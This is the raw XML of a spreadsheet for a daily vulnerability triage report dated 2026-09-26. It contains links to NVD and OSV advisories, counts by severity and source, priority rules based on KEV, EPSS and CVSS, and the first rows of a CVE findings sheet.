Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97563" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97564" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97565" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97590" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97591" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97592" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97593" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97597" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97598" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97600" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97603" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97605" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97615" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97616" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97618" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97620" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97899" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97902" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97914" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97920" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97921" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97922" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97925" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97927" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97928" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97935" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97938" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97942" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97945" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97946" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97947" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97948" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97952" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97958" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97959" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97964" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97965" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97974" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97975" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97976" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97978" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97979" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97984" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97992" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97996" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97997" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98006" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98007" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98019" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98021" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98022" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98034" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98037" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98040" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98047" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98059" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98062" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98065" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98067" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98068" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98071" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98079" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98084" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98085" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98087" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98094" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98095" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98102" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98104" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98113" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98118" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98125" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98128" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98132" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98134" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98137" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98151" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98158" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98159" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98160" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17186" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17181" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17182" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17183" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17184" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17185" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17187" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17188" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65660" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97230" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88361" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53493" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95811" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97636" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97646" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48543" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97320" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97325" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97366" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97368" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97648" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97650" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97649" TargetMode="External" Id="rId381" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet9.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92161" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100368" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100369" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57443" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86439" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17186" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17181" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17182" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17183" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17184" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17185" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17187" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17188" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53493" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57440" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61823" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61825" TargetMode="External" Id="rId19"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8" customWidth="1" min="1" max="1"/>
    <col width="85" customWidth="1" min="2" max="2"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>Daily Vulnerability Report</t>
        </is>
      </c>
      <c r="B1" t="inlineStr"/>
    </row>
    <row r="2">
      <c r="A2" s="2" t="inlineStr">
        <is>
          <t>Report date</t>
        </is>
      </c>
      <c r="B2" s="3" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-25T05:32 to 2026-09-26T05:32</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-26 05:34:05 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>818</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  New - published today</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>782</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Significant updates</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>33</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Added to CISA KEV</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>23</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>214</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>199</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>33</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Unscored</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>352</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>381</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B18" s="3" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="2" t="inlineStr"/>
      <c r="B19" s="3" t="inlineStr"/>
    </row>
    <row r="20">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>Daily bucketing rule</t>
        </is>
      </c>
      <c r="B20" s="3" t="inlineStr">
        <is>
          <t>New = published during this report window. Older CVEs remain in their original publication-day report.</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="2" t="inlineStr">
        <is>
          <t>Update rule</t>
        </is>
      </c>
      <c r="B21" s="3" t="inlineStr">
        <is>
          <t>Older items are shown only when a meaningful security-related change is detected.</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="2" t="inlineStr"/>
      <c r="B22" s="3" t="inlineStr"/>
    </row>
    <row r="23">
      <c r="A23" s="2" t="inlineStr">
        <is>
          <t>Priority rules</t>
        </is>
      </c>
      <c r="B23" s="3" t="inlineStr"/>
    </row>
    <row r="24">
      <c r="A24" s="2" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B24" s="3" t="inlineStr">
        <is>
          <t>In CISA KEV, or EPSS &gt;= 0.50, or SSVC exploitation = active</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="2" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 9.0, or CVSS &gt;= 7.0 with EPSS &gt;= 0.10, or SSVC exploitation = poc</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="2" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 7.0</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="2" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="3" t="inlineStr">
        <is>
          <t>Everything else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CVE-2026-100382</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Wikimedia Foundation Mediawiki - ExternalData Extension allows OS Command Injection.
This issue affects Mediawiki - ExternalData Extension: from * before 3.7.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100382</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100075</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
